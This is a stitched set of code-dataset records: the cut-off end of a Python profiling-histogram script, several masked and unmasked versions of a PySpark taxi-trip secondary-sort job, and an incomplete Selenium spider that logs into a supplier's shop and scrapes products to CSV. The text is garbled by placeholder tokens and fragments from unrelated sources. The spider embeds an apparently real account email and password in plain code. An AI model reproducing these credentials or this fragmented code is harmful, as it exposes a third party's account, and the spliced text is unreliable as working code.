enumerate(peak1['Head']):\n if peaks_normavg.has_key(line):\n peaks_normavg[line] += peak1['Average'][i]\n else:\n peaks_normavg[line] = peak1['Average'][i]\nfor i, line in enumerate(peak2['Head']):\n if peaks_normavg.has_key(line):\n peaks_normavg[line] += peak2['Average'][i]\n else:\n peaks_normavg[line] = peak2['Average'][i]\n\n#print 'peaks_normavg before = ', peaks_normavg.values()[:30]\nfor line in peaks_normavg.keys():\n peaks_normavg[line] = peaks_normavg[line]/peaks_avgsum\n#print 'peaks_normavg after = ', peaks_normavg.values()[:30]\n\n\nnonpeak1 = read_histogram('%s/%s_low_linelevel%d_region0.csv'%(ROOT, eventname, callstacklevel))\nnonpeak2 = read_histogram('%s/%s_low_linelevel%d_region1.csv'%(ROOT, eventname, callstacklevel))\n\nnonpeaks_avgsum = sum(nonpeak1['Average']) + sum(nonpeak2['Average'])\n\nnonpeaks_normavg = {}\n\nfor i, line in enumerate(nonpeak1['Head']):\n if nonpeaks_normavg.has_key(line):\n nonpeaks_normavg[line] += nonpeak1['Average'][i]\n else:\n nonpeaks_normavg[line] = nonpeak1['Average'][i]\nfor i, line in enumerate(nonpeak2['Head']):\n if nonpeaks_normavg.has_key(line):\n nonpeaks_normavg[line] += nonpeak2['Average'][i]\n else:\n nonpeaks_normavg[line] = nonpeak2['Average'][i]\n\n#print 'nonpeaks_normavg before = ', nonpeaks_normavg.values()[:30]\nfor line in nonpeaks_normavg.keys():\n nonpeaks_normavg[line] = nonpeaks_normavg[line]/nonpeaks_avgsum\n#print 'nonpeaks_normavg after = ', nonpeaks_normavg.values()[:30]\n\n#import pdb; pdb.set_trace()\n\nresult = {}\nfor line, bursts in peaks_normavg.iteritems():\n result[line] = bursts\nfor line, bursts in nonpeaks_normavg.iteritems():\n if result.has_key(line):\n result[line] -= bursts\n else:\n result[line] = -1.0*bursts\n\nxlinenum = []\nybursts = []\nfilename = []\nfor line, bursts in result.iteritems():\n if bursts>FREQ_THRESHOLD:\n match = re.search(r'\\s*(\\d+)\\s+\\((.*)\\)', line)\n if match:\n xlinenum += [ match.group(1) ]\n ybursts += [ float(bursts) ]\n matchfname = re.search(r'(\\b\\w+\\.[cFf][\\d]*\\,)', match.group(2))\n if matchfname is None: \n fname = 'Unresolved'\n else:\n fname = matchfname.group(1)[:-1]\n filename += [ fname ]\n \nzipped = zip(xlinenum, ybursts, filename)\nzipped.sort()\nxlinenum, ybursts, filename = zip(*zipped)\n#title = 'Frequent source lines in a region of interest' \ntitle = 'Frequent source lines at high %s regions in callstack level %d'%(eventname, callstacklevel)\nxlabel = 'Sampled function line number'\nylabel = 'Normalized frequency'\n\ndraw_histogram(xlinenum, np.array(ybursts), title, xlabel, ylabel, filename)\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
def key_func(entry):
return entry[0], entry[1]
def make_pair(entry):
key = entry[FIRST_KEY], entry[SECOND_KEY]
return key, entry
def unpair(entry):
return entry[0][0], entry[1][0], entry[1][1]
<|reserved_special_token_0|>
def sorted_group(lines):
return itertools.groupby(lines, key=lambda x: x[0])
def calculate_loss(entry):
key, group = entry
loss = 0
_, _, prev_end = next(group)
for item in group:
_, start, end = item
delta = datetime.strptime(start, '%m/%d/%Y %I:%M:%S %p').timestamp(
) - datetime.strptime(prev_end, '%m/%d/%Y %I:%M:%S %p').timestamp()
if delta > 0:
loss += delta
prev_end = end
return key, loss
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def key_func(entry):
return entry[0], entry[1]
def make_pair(entry):
key = entry[FIRST_KEY], entry[SECOND_KEY]
return key, entry
def unpair(entry):
return entry[0][0], entry[1][0], entry[1][1]
def create_pair_rdd(ctx):
rawRDD = ctx.textFile(INPUT_FILE)
headerlessRDD = rawRDD.filter(lambda x: not x.startswith('Trip ID'))
rdd = headerlessRDD.map(lambda x: COMMA_DELIMITER.split(x))
validRDD = rdd.filter(lambda x: len(x[FIRST_KEY]) > 0 and len(x[
SECOND_KEY]) > 0 and len(x[TRIP_END_TIMESTAMP]) > 0)
pairRDD = validRDD.map(make_pair)
compressedRDD = pairRDD.mapValues(lambda x: (x[SECOND_KEY], x[
TRIP_END_TIMESTAMP]))
return compressedRDD
def sorted_group(lines):
return itertools.groupby(lines, key=lambda x: x[0])
def calculate_loss(entry):
key, group = entry
loss = 0
_, _, prev_end = next(group)
for item in group:
_, start, end = item
delta = datetime.strptime(start, '%m/%d/%Y %I:%M:%S %p').timestamp(
) - datetime.strptime(prev_end, '%m/%d/%Y %I:%M:%S %p').timestamp()
if delta > 0:
loss += delta
prev_end = end
return key, loss
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def partition_func(key):
return portable_hash(key[0])
def key_func(entry):
return entry[0], entry[1]
def make_pair(entry):
key = entry[FIRST_KEY], entry[SECOND_KEY]
return key, entry
def unpair(entry):
return entry[0][0], entry[1][0], entry[1][1]
def create_pair_rdd(ctx):
rawRDD = ctx.textFile(INPUT_FILE)
headerlessRDD = rawRDD.filter(lambda x: not x.startswith('Trip ID'))
rdd = headerlessRDD.map(lambda x: COMMA_DELIMITER.split(x))
validRDD = rdd.filter(lambda x: len(x[FIRST_KEY]) > 0 and len(x[
SECOND_KEY]) > 0 and len(x[TRIP_END_TIMESTAMP]) > 0)
pairRDD = validRDD.map(make_pair)
compressedRDD = pairRDD.mapValues(lambda x: (x[SECOND_KEY], x[
TRIP_END_TIMESTAMP]))
return compressedRDD
def sorted_group(lines):
return itertools.groupby(lines, key=lambda x: x[0])
def calculate_loss(entry):
key, group = entry
loss = 0
_, _, prev_end = next(group)
for item in group:
_, start, end = item
delta = datetime.strptime(start, '%m/%d/%Y %I:%M:%S %p').timestamp(
) - datetime.strptime(prev_end, '%m/%d/%Y %I:%M:%S %p').timestamp()
if delta > 0:
loss += delta
prev_end = end
return key, loss
if __name__ == '__main__':
conf = SparkConf()
ctx = SparkContext(master='local[*]', appName=APP_NAME, conf=conf)
ctx.setLogLevel('INFO')
rdd = create_pair_rdd(ctx)
sortedRDD = rdd.repartitionAndSortWithinPartitions(partitionFunc=
partition_func, numPartitions=4, keyfunc=key_func, ascending=True)
unpairedRDD = sortedRDD.map(unpair, preservesPartitioning=True)
groupedRDD = unpairedRDD.mapPartitions(sorted_group,
preservesPartitioning=True)
lossRDD = groupedRDD.map(calculate_loss)
lossRDD.saveAsTextFile(OUTPUT_DIR.format(timestamp=TIMESTAMP))
ctx.stop()
<|reserved_special_token_1|>
import time
import itertools
import re
from pyspark import SparkContext, SparkConf
from pyspark.rdd import portable_hash
from datetime import datetime
APP_NAME = 'in-shuffle-secondary-sort-compute'
INPUT_FILE = '/data/Taxi_Trips.csv.xsmall'
OUTPUT_DIR = '/data/output-in-shuffle-sort-compute-{timestamp}.txt'
COMMA_DELIMITER = re.compile(',(?=(?:[^"]*"[^"]*")*[^"]*$)')
FIRST_KEY = 1
SECOND_KEY = 2
TRIP_END_TIMESTAMP = 3
TIMESTAMP = int(time.time())
def partition_func(key):
return portable_hash(key[0])
def key_func(entry):
return entry[0], entry[1]
def make_pair(entry):
key = entry[FIRST_KEY], entry[SECOND_KEY]
return key, entry
def unpair(entry):
return entry[0][0], entry[1][0], entry[1][1]
def create_pair_rdd(ctx):
rawRDD = ctx.textFile(INPUT_FILE)
headerlessRDD = rawRDD.filter(lambda x: not x.startswith('Trip ID'))
rdd = headerlessRDD.map(lambda x: COMMA_DELIMITER.split(x))
validRDD = rdd.filter(lambda x: len(x[FIRST_KEY]) > 0 and len(x[
SECOND_KEY]) > 0 and len(x[TRIP_END_TIMESTAMP]) > 0)
pairRDD = validRDD.map(make_pair)
compressedRDD = pairRDD.mapValues(lambda x: (x[SECOND_KEY], x[
TRIP_END_TIMESTAMP]))
return compressedRDD
def sorted_group(lines):
return itertools.groupby(lines, key=lambda x: x[0])
def calculate_loss(entry):
key, group = entry
loss = 0
_, _, prev_end = next(group)
for item in group:
_, start, end = item
delta = datetime.strptime(start, '%m/%d/%Y %I:%M:%S %p').timestamp(
) - datetime.strptime(prev_end, '%m/%d/%Y %I:%M:%S %p').timestamp()
if delta > 0:
loss += delta
prev_end = end
return key, loss
if __name__ == '__main__':
conf = SparkConf()
ctx = SparkContext(master='local[*]', appName=APP_NAME, conf=conf)
ctx.setLogLevel('INFO')
rdd = create_pair_rdd(ctx)
sortedRDD = rdd.repartitionAndSortWithinPartitions(partitionFunc=
partition_func, numPartitions=4, keyfunc=key_func, ascending=True)
unpairedRDD = sortedRDD.map(unpair, preservesPartitioning=True)
groupedRDD = unpairedRDD.mapPartitions(sorted_group,
preservesPartitioning=True)
lossRDD = groupedRDD.map(calculate_loss)
lossRDD.saveAsTextFile(OUTPUT_DIR.format(timestamp=TIMESTAMP))
ctx.stop()
<|reserved_special_token_1|>
import time
import itertools
import re
from pyspark import SparkContext, SparkConf
from pyspark.rdd import portable_hash
from datetime import datetime
APP_NAME = 'in-shuffle-secondary-sort-compute'
INPUT_FILE = '/data/Taxi_Trips.csv.xsmall'
OUTPUT_DIR = '/data/output-in-shuffle-sort-compute-{timestamp}.txt'
COMMA_DELIMITER = re.compile(''',(?=(?:[^"]*"[^"]*")*[^"]*$)''')
FIRST_KEY = 1
SECOND_KEY = 2
TRIP_END_TIMESTAMP = 3
TIMESTAMP = int(time.time())
def partition_func(key):
return portable_hash(key[0])
def key_func(entry):
return entry[0], entry[1]
def make_pair(entry):
key = (entry[FIRST_KEY], entry[SECOND_KEY])
return key, entry
def unpair(entry):
return entry[0][0], entry[1][0], entry[1][1]
def create_pair_rdd(ctx):
rawRDD = ctx.textFile(INPUT_FILE)
headerlessRDD = rawRDD.filter(lambda x: not x.startswith('Trip ID'))
rdd = headerlessRDD.map(lambda x: COMMA_DELIMITER.split(x))
validRDD = rdd.filter(lambda x: len(x[FIRST_KEY]) > 0 and len(x[SECOND_KEY]) > 0 and len(x[TRIP_END_TIMESTAMP]) > 0)
pairRDD = validRDD.map(make_pair)
compressedRDD = pairRDD.mapValues(lambda x: (x[SECOND_KEY], x[TRIP_END_TIMESTAMP]))
return compressedRDD
def sorted_group(lines):
return itertools.groupby(lines, key=lambda x: x[0])
def calculate_loss(entry):
key, group = entry
loss = 0
_, _, prev_end = next(group)
for item in group:
_, start, end = item
delta = datetime.strptime(start, '%m/%d/%Y %I:%M:%S %p').timestamp() \
- datetime.strptime(prev_end, '%m/%d/%Y %I:%M:%S %p').timestamp()
if delta > 0:
loss += delta
prev_end = end
return key, loss
if __name__ == "__main__":
conf = SparkConf()
ctx = SparkContext(master="local[*]", appName=APP_NAME, conf=conf)
ctx.setLogLevel('INFO')
rdd = create_pair_rdd(ctx)
sortedRDD = rdd.repartitionAndSortWithinPartitions(partitionFunc=partition_func,
numPartitions=4,
keyfunc=key_func,
ascending=True)
unpairedRDD = sortedRDD.map(unpair, preservesPartitioning=True)
groupedRDD = unpairedRDD.mapPartitions(sorted_group, preservesPartitioning=True)
lossRDD = groupedRDD.map(calculate_loss)
lossRDD.saveAsTextFile(OUTPUT_DIR.format(timestamp=TIMESTAMP))
ctx.stop()
|
flexible
|
{
"blob_id": "05d6f15102be41937febeb63ed66a77d3b0a678e",
"index": 8517,
"step-1": "<mask token>\n\n\ndef key_func(entry):\n return entry[0], entry[1]\n\n\ndef make_pair(entry):\n key = entry[FIRST_KEY], entry[SECOND_KEY]\n return key, entry\n\n\ndef unpair(entry):\n return entry[0][0], entry[1][0], entry[1][1]\n\n\n<mask token>\n\n\ndef sorted_group(lines):\n return itertools.groupby(lines, key=lambda x: x[0])\n\n\ndef calculate_loss(entry):\n key, group = entry\n loss = 0\n _, _, prev_end = next(group)\n for item in group:\n _, start, end = item\n delta = datetime.strptime(start, '%m/%d/%Y %I:%M:%S %p').timestamp(\n ) - datetime.strptime(prev_end, '%m/%d/%Y %I:%M:%S %p').timestamp()\n if delta > 0:\n loss += delta\n prev_end = end\n return key, loss\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef key_func(entry):\n return entry[0], entry[1]\n\n\ndef make_pair(entry):\n key = entry[FIRST_KEY], entry[SECOND_KEY]\n return key, entry\n\n\ndef unpair(entry):\n return entry[0][0], entry[1][0], entry[1][1]\n\n\ndef create_pair_rdd(ctx):\n rawRDD = ctx.textFile(INPUT_FILE)\n headerlessRDD = rawRDD.filter(lambda x: not x.startswith('Trip ID'))\n rdd = headerlessRDD.map(lambda x: COMMA_DELIMITER.split(x))\n validRDD = rdd.filter(lambda x: len(x[FIRST_KEY]) > 0 and len(x[\n SECOND_KEY]) > 0 and len(x[TRIP_END_TIMESTAMP]) > 0)\n pairRDD = validRDD.map(make_pair)\n compressedRDD = pairRDD.mapValues(lambda x: (x[SECOND_KEY], x[\n TRIP_END_TIMESTAMP]))\n return compressedRDD\n\n\ndef sorted_group(lines):\n return itertools.groupby(lines, key=lambda x: x[0])\n\n\ndef calculate_loss(entry):\n key, group = entry\n loss = 0\n _, _, prev_end = next(group)\n for item in group:\n _, start, end = item\n delta = datetime.strptime(start, '%m/%d/%Y %I:%M:%S %p').timestamp(\n ) - datetime.strptime(prev_end, '%m/%d/%Y %I:%M:%S %p').timestamp()\n if delta > 0:\n loss += delta\n prev_end = end\n return key, loss\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef partition_func(key):\n return portable_hash(key[0])\n\n\ndef key_func(entry):\n return entry[0], entry[1]\n\n\ndef make_pair(entry):\n key = entry[FIRST_KEY], entry[SECOND_KEY]\n return key, entry\n\n\ndef unpair(entry):\n return entry[0][0], entry[1][0], entry[1][1]\n\n\ndef create_pair_rdd(ctx):\n rawRDD = ctx.textFile(INPUT_FILE)\n headerlessRDD = rawRDD.filter(lambda x: not x.startswith('Trip ID'))\n rdd = headerlessRDD.map(lambda x: COMMA_DELIMITER.split(x))\n validRDD = rdd.filter(lambda x: len(x[FIRST_KEY]) > 0 and len(x[\n SECOND_KEY]) > 0 and len(x[TRIP_END_TIMESTAMP]) > 0)\n pairRDD = validRDD.map(make_pair)\n compressedRDD = pairRDD.mapValues(lambda x: (x[SECOND_KEY], x[\n TRIP_END_TIMESTAMP]))\n return compressedRDD\n\n\ndef sorted_group(lines):\n return itertools.groupby(lines, key=lambda x: x[0])\n\n\ndef calculate_loss(entry):\n key, group = entry\n loss = 0\n _, _, prev_end = next(group)\n for item in group:\n _, start, end = item\n delta = datetime.strptime(start, '%m/%d/%Y %I:%M:%S %p').timestamp(\n ) - datetime.strptime(prev_end, '%m/%d/%Y %I:%M:%S %p').timestamp()\n if delta > 0:\n loss += delta\n prev_end = end\n return key, loss\n\n\nif __name__ == '__main__':\n conf = SparkConf()\n ctx = SparkContext(master='local[*]', appName=APP_NAME, conf=conf)\n ctx.setLogLevel('INFO')\n rdd = create_pair_rdd(ctx)\n sortedRDD = rdd.repartitionAndSortWithinPartitions(partitionFunc=\n partition_func, numPartitions=4, keyfunc=key_func, ascending=True)\n unpairedRDD = sortedRDD.map(unpair, preservesPartitioning=True)\n groupedRDD = unpairedRDD.mapPartitions(sorted_group,\n preservesPartitioning=True)\n lossRDD = groupedRDD.map(calculate_loss)\n lossRDD.saveAsTextFile(OUTPUT_DIR.format(timestamp=TIMESTAMP))\n ctx.stop()\n",
"step-4": "import time\nimport itertools\nimport re\nfrom pyspark import SparkContext, SparkConf\nfrom pyspark.rdd import portable_hash\nfrom datetime import datetime\nAPP_NAME = 'in-shuffle-secondary-sort-compute'\nINPUT_FILE = '/data/Taxi_Trips.csv.xsmall'\nOUTPUT_DIR = '/data/output-in-shuffle-sort-compute-{timestamp}.txt'\nCOMMA_DELIMITER = re.compile(',(?=(?:[^\"]*\"[^\"]*\")*[^\"]*$)')\nFIRST_KEY = 1\nSECOND_KEY = 2\nTRIP_END_TIMESTAMP = 3\nTIMESTAMP = int(time.time())\n\n\ndef partition_func(key):\n return portable_hash(key[0])\n\n\ndef key_func(entry):\n return entry[0], entry[1]\n\n\ndef make_pair(entry):\n key = entry[FIRST_KEY], entry[SECOND_KEY]\n return key, entry\n\n\ndef unpair(entry):\n return entry[0][0], entry[1][0], entry[1][1]\n\n\ndef create_pair_rdd(ctx):\n rawRDD = ctx.textFile(INPUT_FILE)\n headerlessRDD = rawRDD.filter(lambda x: not x.startswith('Trip ID'))\n rdd = headerlessRDD.map(lambda x: COMMA_DELIMITER.split(x))\n validRDD = rdd.filter(lambda x: len(x[FIRST_KEY]) > 0 and len(x[\n SECOND_KEY]) > 0 and len(x[TRIP_END_TIMESTAMP]) > 0)\n pairRDD = validRDD.map(make_pair)\n compressedRDD = pairRDD.mapValues(lambda x: (x[SECOND_KEY], x[\n TRIP_END_TIMESTAMP]))\n return compressedRDD\n\n\ndef sorted_group(lines):\n return itertools.groupby(lines, key=lambda x: x[0])\n\n\ndef calculate_loss(entry):\n key, group = entry\n loss = 0\n _, _, prev_end = next(group)\n for item in group:\n _, start, end = item\n delta = datetime.strptime(start, '%m/%d/%Y %I:%M:%S %p').timestamp(\n ) - datetime.strptime(prev_end, '%m/%d/%Y %I:%M:%S %p').timestamp()\n if delta > 0:\n loss += delta\n prev_end = end\n return key, loss\n\n\nif __name__ == '__main__':\n conf = SparkConf()\n ctx = SparkContext(master='local[*]', appName=APP_NAME, conf=conf)\n ctx.setLogLevel('INFO')\n rdd = create_pair_rdd(ctx)\n sortedRDD = rdd.repartitionAndSortWithinPartitions(partitionFunc=\n partition_func, numPartitions=4, keyfunc=key_func, ascending=True)\n unpairedRDD = sortedRDD.map(unpair, preservesPartitioning=True)\n groupedRDD = unpairedRDD.mapPartitions(sorted_group,\n preservesPartitioning=True)\n lossRDD = groupedRDD.map(calculate_loss)\n lossRDD.saveAsTextFile(OUTPUT_DIR.format(timestamp=TIMESTAMP))\n ctx.stop()\n",
"step-5": "import time\nimport itertools\nimport re\n\nfrom pyspark import SparkContext, SparkConf\nfrom pyspark.rdd import portable_hash\nfrom datetime import datetime\n\nAPP_NAME = 'in-shuffle-secondary-sort-compute'\nINPUT_FILE = '/data/Taxi_Trips.csv.xsmall'\nOUTPUT_DIR = '/data/output-in-shuffle-sort-compute-{timestamp}.txt'\n\nCOMMA_DELIMITER = re.compile(''',(?=(?:[^\"]*\"[^\"]*\")*[^\"]*$)''')\n\nFIRST_KEY = 1\nSECOND_KEY = 2\nTRIP_END_TIMESTAMP = 3\n\n\nTIMESTAMP = int(time.time())\n\n\ndef partition_func(key):\n return portable_hash(key[0])\n\n\ndef key_func(entry):\n return entry[0], entry[1]\n\n\ndef make_pair(entry):\n key = (entry[FIRST_KEY], entry[SECOND_KEY])\n return key, entry\n\n\ndef unpair(entry):\n return entry[0][0], entry[1][0], entry[1][1]\n\n\ndef create_pair_rdd(ctx):\n rawRDD = ctx.textFile(INPUT_FILE)\n headerlessRDD = rawRDD.filter(lambda x: not x.startswith('Trip ID'))\n rdd = headerlessRDD.map(lambda x: COMMA_DELIMITER.split(x))\n validRDD = rdd.filter(lambda x: len(x[FIRST_KEY]) > 0 and len(x[SECOND_KEY]) > 0 and len(x[TRIP_END_TIMESTAMP]) > 0)\n pairRDD = validRDD.map(make_pair)\n compressedRDD = pairRDD.mapValues(lambda x: (x[SECOND_KEY], x[TRIP_END_TIMESTAMP]))\n\n return compressedRDD\n\n\ndef sorted_group(lines):\n return itertools.groupby(lines, key=lambda x: x[0])\n\n\ndef calculate_loss(entry):\n key, group = entry\n loss = 0\n _, _, prev_end = next(group)\n\n for item in group:\n _, start, end = item\n delta = datetime.strptime(start, '%m/%d/%Y %I:%M:%S %p').timestamp() \\\n - datetime.strptime(prev_end, '%m/%d/%Y %I:%M:%S %p').timestamp()\n if delta > 0:\n loss += delta\n prev_end = end\n\n return key, loss\n\n\nif __name__ == \"__main__\":\n conf = SparkConf()\n ctx = SparkContext(master=\"local[*]\", appName=APP_NAME, conf=conf)\n ctx.setLogLevel('INFO')\n\n rdd = create_pair_rdd(ctx)\n\n sortedRDD = rdd.repartitionAndSortWithinPartitions(partitionFunc=partition_func,\n numPartitions=4,\n keyfunc=key_func,\n ascending=True)\n unpairedRDD = sortedRDD.map(unpair, preservesPartitioning=True)\n groupedRDD = unpairedRDD.mapPartitions(sorted_group, preservesPartitioning=True)\n\n lossRDD = groupedRDD.map(calculate_loss)\n lossRDD.saveAsTextFile(OUTPUT_DIR.format(timestamp=TIMESTAMP))\n\n ctx.stop()\n",
"step-ids": [
5,
6,
8,
10,
11
]
}
|
[
5,
6,
8,
10,
11
] |
<|reserved_special_token_0|>
class ProductSpider(scrapy.Spider):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __init__(self):
options = webdriver.ChromeOptions()
options.add_argument('--start-maximized')
self.driver = webdriver.Chrome(chrome_options=options)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ProductSpider(scrapy.Spider):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __init__(self):
options = webdriver.ChromeOptions()
options.add_argument('--start-maximized')
self.driver = webdriver.Chrome(chrome_options=options)
def parse(self, response):
fh = logging.FileHandler(log_output_file)
fh.setLevel(logging.INFO)
logging.getLogger('selenium.webdriver.remote.remote_connection'
).setLevel(logging.WARNING)
logging.getLogger('urllib3.connectionpool').setLevel(logging.WARNING)
logging.getLogger('selenium.webdriver.remote.remote_connection'
).addHandler(fh)
logging.getLogger('urllib3.connectionpool').addHandler(fh)
logging.getLogger().addHandler(fh)
self.loggger = logging.getLogger()
self.driver.get(response.url)
list1 = []
list2 = []
list3 = []
list4 = []
list5 = []
list3_categories = []
list4_categories = []
csv_categories1 = ''
csv_heading = ''
csv_stock = ''
csv_price_new = ''
csv_price_old = ''
csv_desc = ''
csv_article_number = ''
csv_image_url = []
old_product_url = []
WebDriverWait(self.driver, 20).until(EC.presence_of_element_located
((By.ID, 'email')))
username = self.driver.find_element_by_id('email')
username.send_keys('info@themobilestore.se')
username = self.driver.find_element_by_id('password')
username.send_keys('order88')
login = self.driver.find_element_by_class_name('button-confirm')
login.click()
time.sleep(5)
fh, abs_path = mkstemp()
with fdopen(fh, 'w') as new_file:
with open('tekniknet.csv') as old_file:
for line in old_file:
new_file.write(line.replace('NEW', 'old'))
remove('tekniknet.csv')
move(abs_path, 'tekniknet.csv')
with open('tekniknet.csv', 'r') as ins:
for line in ins:
old_product_url.append(line.split(',')[-1])
file = open('tekniknet.csv', 'a', errors='replace')
for wrapper1 in self.driver.find_elements_by_class_name('level-0'):
child_wrapper1 = wrapper1.find_element_by_xpath('./a')
link1 = child_wrapper1.get_attribute('href')
list1.append(link1)
self.loggger.info(
'*************************************************')
self.loggger.info(link1)
for i in range(0, len(list1) - 4):
self.driver.get(list1[i])
try:
WebDriverWait(self.driver, 20).until(EC.
presence_of_element_located((By.CLASS_NAME, 'inner')))
for wrapper2 in self.driver.find_elements_by_class_name('inner'
):
try:
sub2 = wrapper2.find_element_by_class_name('subLinks')
child_wrapper2 = sub2.find_elements_by_xpath('.//a')
for child2 in child_wrapper2:
link2 = child2.get_attribute('href')
list2.append(link2)
self.loggger.info(
'^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^'
)
self.loggger.info(link2)
except Exception as e:
self.loggger.info(e)
self.loggger.info('error')
except:
try:
WebDriverWait(self.driver, 20).until(EC.
presence_of_element_located((By.ID,
'categorySubCategories')))
subcategory = self.driver.find_element_by_id(
'categorySubCategories')
wrapper2_1 = subcategory.find_elements_by_xpath('.//a')
for child3 in wrapper2_1:
link2_1 = child3.get_attribute('href')
list5.append(link2_1)
for n in range(0, len(list5)):
self.driver.get(list5[n])
WebDriverWait(self.driver, 20).until(EC.
presence_of_element_located((By.ID,
'categorySubCategories')))
subcategory = self.driver.find_element_by_id(
'categorySubCategories')
wrapper2_1_1 = subcategory.find_elements_by_xpath(
'.//a')
for child3_1 in wrapper2_1_1:
if child3_1.text != 'Visa alla':
link2_1_1 = child3_1.get_attribute('href')
list2.append(link2_1_1)
except:
try:
breadcrumbs2 = self.driver.find_element_by_id(
'breadcrumbs')
categories2 = breadcrumbs2.find_elements_by_xpath(
'.//li')
csv_categories2 = ''
for category2 in categories2:
csv_categories2 = (csv_categories2 + category2.
text + '/')
WebDriverWait(self.driver, 20).until(EC.
presence_of_element_located((By.CLASS_NAME,
'listProduct')))
for wrapper2_2 in self.driver.find_elements_by_class_name(
'listProduct'):
wrapper2_3 = wrapper2_2.find_element_by_xpath(
'.//a')
link2_2 = wrapper2_3.get_attribute('href')
list4.append(link2_2)
list4_categories.append(csv_categories2)
self.loggger.info(
'&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&'
)
self.loggger.info(link2_2)
self.loggger.info('error')
except Exception as e:
self.loggger.info(e)
self.loggger.info('error')
for j in range(0, len(list2)):
try:
self.loggger.info('**********-------------- ' + str(j) +
' ******************************')
self.driver.get(list2[j])
WebDriverWait(self.driver, 30).until(EC.
presence_of_element_located((By.ID, 'breadcrumbs')))
breadcrumbs1 = self.driver.find_element_by_id('breadcrumbs')
categories1 = breadcrumbs1.find_elements_by_xpath('.//li')
csv_categories1 = ''
for category1 in categories1:
csv_categories1 = csv_categories1 + category1.text + '/'
WebDriverWait(self.driver, 20).until(EC.
presence_of_element_located((By.CLASS_NAME, 'listProduct'))
)
for wrapper3 in self.driver.find_elements_by_class_name(
'listProduct'):
child_wrapper3 = wrapper3.find_element_by_xpath('.//a')
link3 = child_wrapper3.get_attribute('href')
list3.append(link3)
list3_categories.append(csv_categories1)
self.loggger.info(
'&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&'
)
self.loggger.info(link3)
except Exception as e:
self.loggger.info(e)
self.loggger.info('error')
for k in range(0, len(list3)):
try:
if list3[k] not in old_product_url:
self.loggger.info('----------------------- ' + str
(k) + ' ******************************')
self.driver.get(list3[k])
WebDriverWait(self.driver, 30).until(EC.
presence_of_element_located((By.ID, 'breadcrumbs')))
offer = self.driver.find_element_by_id('productPageUpper')
try:
heading = offer.find_element_by_class_name('pHeader')
csv_heading = heading.text.replace(',', '.')
except:
self.loggger.info('heading3 non-exist')
csv_heading = ''
try:
stock = offer.find_element_by_class_name('instock')
csv_stock = stock.text
except:
csv_stock = 'Out of stock'
self.loggger.info('stock3 non-exist')
csv_stock = ''
try:
price_new = offer.find_element_by_class_name(
'priceRegular')
csv_price_new = price_new.text.split(' ')[0]
except:
try:
price_new = offer.find_element_by_class_name(
'priceNew')
csv_price_new = price_new.text.split(' ')[0]
price_old = offer.find_element_by_class_name(
'priceOld')
csv_price_old = price_old.text.split(' ')[0]
except:
self.loggger.info('price3 non-exist')
csv_price_old = ''
csv_price_new = ''
try:
desc = offer.find_element_by_id('pDesc')
csv_desc = desc.get_attribute('innerHTML').replace(',',
'-').replace('\n', ' ').replace('\r', '').rstrip(
).lstrip()
except:
self.loggger.info('description3 non-exist')
csv_desc = ''
try:
article_number = offer.find_element_by_id(
'pManufacturer')
csv_article_number = article_number.text.split(' ')[-1
].replace(',', '.')
except:
self.loggger.info('article number3 non-exist')
csv_article_number = ''
try:
pimages = offer.find_elements_by_xpath('.//img')
csv_image_url = []
for pimage in pimages:
image_url = pimage.get_attribute('src')
if image_url not in csv_image_url:
csv_image_url.append(image_url)
except:
self.loggger.info('image3 non-exist')
if len(csv_image_url) == 1:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 2:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 3:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + csv_stock + ',' + list3
[k] + '\n')
elif len(csv_image_url) == 4:
file.write('NEW' + ',' + csv_article_number + ',' +
list3_categories[k].split('/')[1] + ',' +
list3_categories[k].split('/')[2] + ',' +
list3_categories[k].split('/')[3] + ',' +
